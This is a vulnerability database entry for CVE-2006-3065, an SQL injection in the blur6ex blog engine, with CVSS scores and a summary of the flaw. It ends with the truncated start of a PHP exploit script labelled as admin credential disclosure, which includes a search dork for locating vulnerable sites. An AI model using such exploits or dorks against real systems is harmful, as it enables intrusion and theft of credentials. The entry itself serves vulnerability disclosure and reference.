7.5
CVSSv2

CVE-2006-3065

Published: 19/06/2006 Updated: 18/10/2018
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in engine/shards/blog.php in blur6ex 0.3.462 allows remote malicious users to execute arbitrary SQL commands via the ID parameter in a proc_reply action in the blog shard. NOTE: This is a similar vulnerability to CVE-2006-1763, but the affected code and versions are different.

Vulnerable Product Search on Vulmon Subscribe to Product

blursoft blur6ex 0.3.462

Exploits

#!/usr/bin/php -q -d short_open_tag=on <? echo "blur6ex <= 03462 'ID' blind SQL injection / admin credentials disclosure\r\n"; echo "by rgod rgod@autisticiorg\r\n"; echo "site: retrogodaltervistaorg\r\n"; echo "dork: \"powered by blur6ex\"\r\n\r\n"; /* works regardless of phpini settings */ if ($argc<3) { echo "Usage: php "$ ...